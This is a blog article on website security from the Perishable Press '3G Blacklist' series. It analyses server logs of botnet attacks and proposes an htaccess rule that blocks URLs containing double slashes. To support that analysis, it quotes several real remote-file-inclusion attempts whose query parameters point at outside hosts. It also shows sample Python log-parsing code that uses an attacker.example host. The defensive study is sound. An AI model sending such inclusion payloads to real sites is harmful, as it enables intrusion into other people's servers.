In this series of five articles, I share insights and discoveries concerning website security and protecting against malicious attacks. In this first article of the series, I examine the process of identifying attack trends and using them to immunize against future attacks. Subsequent articles will focus on key blacklist strategies designed to protect your site transparently, effectively, and efficiently. At the conclusion of the series, the five articles will culminate in the release of the next generation 3G Blacklist.
Improving Security by Exploiting Server Attack Patterns
Crackers, spammers, scrapers, and other attackers are getting smarter and more creative with their methods. It is becoming increasingly difficult to identify elements of an attack that may be effectively manipulated to prevent further attempts. For example, attackers almost exclusively employ decentralized botnets to execute their attacks. Such decentralized networks consist of large numbers of compromised computer systems that are remotely controlled to post data, run scripts, and request resources. Each compromised computer used in an attack is associated with a unique IP, thus making it impossible to prevent future attempts by blocking one or more addresses:
# another blocked scumbag
deny from 123.456.789.321
Unfortunately, identifying and blocking every IP address involved with an attack proves utterly useless because a completely different subset of computers may be used for the next attack. Unless you are blocking specific networks of known offenders, those countless “deny from” entries in your htaccess file are effectively worthless, wasting resources and reducing performance. For similar reasons, identifying and blocking each different user agent involved in an attack is similarly futile. Faking user-agent data is trivial and even unnecessary when utilizing localized software on compromised machines.
If blocking individual IPs and user agents is ineffective, which residual data may be used to immunize against repeat attacks? Examining your site’s access and error logs reveals a plethora of data for each request, including remote (IP) address, user agent, referral source, requested resource, and server response. Within these data, recognizing and exploiting server attack patterns is critical for improving site security and preventing repeat offenses. Fortunately, decentralized random attacks frequently target similar resources, thereby revealing key patterns in requested URL and query string data that may be used to secure your site.
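As a rough sketch of this kind of log review, the following Python snippet splits log lines into fields and tallies the values of each one, so that fields with recurring values stand out from fields that are different on every request. It assumes Apache's "combined" log format. The sample lines, IP addresses, user agents, and the attacker.example host are made up for illustration, and the names parse_line and tally are hypothetical helpers.

```python
import re
from collections import Counter

# Assumes Apache's "combined" log format; adjust the pattern to your own LogFormat.
LOG_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<protocol>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referrer>[^"]*)" "(?P<agent>[^"]*)"'
)

def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not match."""
    match = LOG_LINE.match(line)
    return match.groupdict() if match else None

def tally(entries, field):
    """Count how often each value of a field occurs across parsed entries."""
    return Counter(entry[field] for entry in entries)

# Hypothetical log lines (documentation-range IPs, made-up agents and hosts)
sample_log = [
    '192.0.2.10 - - [09/Mar/2008:10:00:00 +0000] "GET /press/tag/php//includes/kb_constants.php?module_root_path=http://attacker.example/c?? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [09/Mar/2008:10:05:00 +0000] "GET /press/wp-content/online/code//mcf.php?content=http://attacker.example/c?? HTTP/1.1" 404 512 "-" "Mozilla/5.0"',
]

entries = [e for e in map(parse_line, sample_log) if e]
for field in ("ip", "agent", "referrer", "target"):
    print(field, tally(entries, field).most_common(3))
```

On a real log, the IP and user-agent tallies tend to be flat, which is the point: the useful repetition usually shows up in the requested resource instead.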
A real-world example
During a recent examination of my access and error logs, I took the time to identify and isolate approximately 50 attempted vulnerability exploits. Among the recorded data, no recognizable or otherwise useful patterns exist within the IP-address, user-agent, or referrer data subsets. To see this for yourself, check out the cultivated dataset and compare the various IP and user-agent data. Several repeat values do occur; however, the evidence clearly suggests the decentralized nature of the attack. Within the requested-resource data, on the other hand, several useful patterns emerge. Consider the following subset of requested URL data (Note: in the following log entries, perishablepress.com has been replaced with example.com to prevent 404 errors from googlebot et al):
https://example.com/press/2008/03/08/blacklist-candidate-number-2008-03-09//playing.php/common/db.php?commonpath=http://www.trepamontes4x4.com/digi/menu?
https://example.com/press/2007/12/17/how-to-enable-php-error-logging-via-htaccess//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.blackid.org/bo.do??
https://example.com/press/wp-content/online/code//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.labcorp.co.kr/labcorp_system//skin/zero_vote/test??
https://example.com/press/2008/03/08/blacklist-candidate-number-2008-03-09//app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=http://www.sohbetsuper.org/modules/shoutbox/box??
https://example.com/press/tag/php//includes/kb_constants.php?module_root_path=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c??
https://example.com/press/wp-content/online/code//mcf.php?content=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c??
What is the unifying element among this seemingly disparate collection of targeted URLs? Keep in mind that we are trying to evolve the blacklist strategy by identifying and exploiting common aspects of an attack, thereby maximizing our coding efforts. As you can see, there are a few common elements, such as the following two character strings:
- “common” (found in the first and fourth URLs)
- “eesmeray” (found in the last two URLs)
Beyond this, the careful observer will also notice yet another common element, one that unifies the entire collection of attack strings. Within each URL, appearing before the query string, are two adjacent forward-slash characters (“//”). Apparently, these “double slashes” are artifacts of the URL-targeting process. Certain attack scripts assume a missing “trailing slash” on target URLs. Thus, such scripts automatically append a slash to every tested URL, so that the attack path is not run together with the final segment of the target URL.
The result of this misguided cracker assumption is that many attempted attacks involve URLs containing two adjacent forward slashes. How frequently is this behavior seen? Examine your access/error logs and see for yourself. In my experience, approximately half of all attacks target nonexistent URLs that contain the double slashes.
For example, if you investigate the entire error log referenced in this article, you will find that roughly half of the entries could have been avoided if the now-infamous double slashes had been blocked at the server level.
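To estimate that share for your own logs, something along these lines may help. This is only a sketch: it assumes you have already extracted the request targets (the path plus query string from each request line), and the sample targets, the attacker.example host, and the helper names path_of and double_slash_share are all hypothetical.

```python
def path_of(target):
    """Strip the query string from a request target such as '/a//b.php?x=1'."""
    return target.split("?", 1)[0]

def double_slash_share(targets):
    """Fraction of request targets whose path contains two adjacent slashes."""
    if not targets:
        return 0.0
    hits = sum(1 for target in targets if "//" in path_of(target))
    return hits / len(targets)

# Hypothetical request targets, as they would appear in the request line of a log entry
sample_targets = [
    "/press/tag/php//includes/kb_constants.php?module_root_path=http://attacker.example/c??",
    "/press/wp-content/online/code//mcf.php?content=http://attacker.example/c??",
    "/press/index.php?page=http://attacker.example/c??",
    "/press/about/",
]

share = double_slash_share(sample_targets)
print(f"{share:.0%} of sample requests contain '//' in the path")
```

The query string is stripped before checking because remote-include attempts nearly always carry an “http://” value there, which would otherwise count every such request as a double-slash hit.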
A real-world solution
At this point, the question becomes “is it possible and safe to deny all URL requests that include two adjacent forward slashes?” Fortunately, the answer is a resounding “yes!” Allow me to explain why this is the case:
- beyond the “http://” declaration, double slashes are not present in valid/legitimate URLs
- the RedirectMatch directive considers neither the protocol nor the domain (i.e., “http://domain.tld”) of the URL when pattern matching against the given expression (e.g., “//”)
- the double slashes frequently appear directly after legitimate URLs and yet before the query string
Therefore, using Apache’s RedirectMatch directive, we arrive at a simple, elegant method for securing sites against a significant number of attacks. To implement this technique, either place the following code into your site’s root htaccess file, or wait for the imminent release of the 3G Blacklist, which will include the following directive:
# BLOCK DOUBLE SLASH
<IfModule mod_alias.c>
	RedirectMatch 403 \/\/
</IfModule>
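Before deploying, it can be reassuring to check the expression against a handful of URLs. The Python sketch below applies the same regular expression to the path portion of each URL only, on the assumption (consistent with the reasoning above) that the directive sees neither the protocol, the domain, nor the query string. It models the pattern match alone, not any URL normalization your server may perform before matching. The two attack URLs are taken from the log excerpt in this article, the two legitimate URLs are hypothetical, and would_be_blocked is a made-up helper name.

```python
import re
from urllib.parse import urlsplit

# Same expression as in the RedirectMatch line; "\/" is simply an escaped "/".
DOUBLE_SLASH = re.compile(r"\/\/")

def would_be_blocked(url):
    """Return True if the URL path (not scheme, host, or query) contains '//'."""
    path = urlsplit(url).path
    return DOUBLE_SLASH.search(path) is not None

urls = [
    # Two attack URLs quoted earlier in this article
    "https://example.com/press/tag/php//includes/kb_constants.php?module_root_path=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c??",
    "https://example.com/press/wp-content/online/code//mcf.php?content=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c??",
    # Hypothetical legitimate requests
    "https://example.com/press/tag/php/",
    "https://example.com/press/?ref=http://example.org/",
]

for url in urls:
    verdict = "403" if would_be_blocked(url) else "ok "
    print(verdict, url)
```

The last URL is the interesting case: it contains “http://” twice, yet its path is just “/press/”, so a path-only match leaves it alone.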
Once in place, keep an eye on your access and error logs. You should see the results immediately. ;) Since implementing this single line of code, I have seen the number of attempted attacks (as indicated by access/error log files) decrease by around half. I still find it hard to believe that such a tiny bit of code could save so much time!
Hopefully, this article will help webmasters, designers, and bloggers improve their overall site security and defend against repeat server attacks. By identifying patterns and trends in server attacks, it is possible to isolate unifying elements and use them to immunize against future attempts. By focusing on the most common features of spam and cracker attacks, we can maximize our efforts and avoid the time-wasting futility of chasing individual properties of decentralized botnets.
Stay tuned for the continuation of Building the 3G Blacklist, Part 2: Improving Site Security by Preventing Malicious Query String Exploits. If you have yet to do so, I highly encourage you to subscribe to Perishable Press. As always, thank you for your generous attention.
As mentioned in the article, I have cultivated a log file demonstrating the series of attacks that led to the development of this “double-slash” blacklisting technique. The file features approximately 50 entries, each of which includes myriad data ranging from referrer and remote identity to user agent and query string. Additionally, in the process of writing this article, the log entries were divided into various sections and commented accordingly.